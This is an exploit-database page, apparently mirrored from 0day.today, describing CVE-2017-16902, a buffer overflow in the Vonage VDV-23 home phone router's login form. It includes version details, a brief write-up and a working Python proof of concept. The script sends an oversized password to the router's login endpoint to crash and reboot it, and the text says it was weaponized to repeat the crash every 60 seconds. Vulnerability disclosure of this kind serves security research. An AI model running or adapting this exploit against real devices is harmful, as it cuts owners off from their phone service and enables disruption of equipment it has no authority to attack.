Lucene search
K

Vonage VDV-23 - Denial of Service Exploit

🗓️ 22 Nov 2017 00:00:00Reported by Nu11By73Type 
zdt
 zdt
🔗 0day.today👁 22 Views

Vonage VDV-23 - Buffer Overflow Vulnerability and Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Vonage VDV-23 115 Denial of Service Vulnerability
24 Nov 201700:00
cnvd
CVE
CVE-2017-16902
20 Nov 201718:00
cve
Cvelist
CVE-2017-16902
20 Nov 201718:00
cvelist
NVD
CVE-2017-16902
20 Nov 201718:29
nvd
Prion
Code injection
20 Nov 201718:29
prion
Overview
During an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is controllable and allow for full remote code execution.
 
Device Description:
1 port residential gateway
 
Hardware Version:
VDV-23: 115
 
Original Software Version:
3.2.11-0.9.40
 
Exploitation Writeup
This exploit was a simple buffer overflow. The use of spike fuzzer took place to identify the crash condition. When the application crashes, the router reboots causing a denial of service condition. The script below was further weaponized to sleep for a 60 second period while the device rebooted then continue one execution after another.
 
Proof of concept code:
The code below was used to exploit the application. This testing was only performed against denial of service conditions. The crash that was experienced potentially holds the ability to allow remote code execution. Further research will be performed against the device.
 
DOSTest.py
 
import requests

passw = 'A' * 10580
post_data = {'loginUsername':'router', 'loginPassword':passw, 'x':'0', 'y':'0'}

post_response = requests.post(url='http://192.168.15.1/goform/login', data=post_data)

#  0day.today [2018-02-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation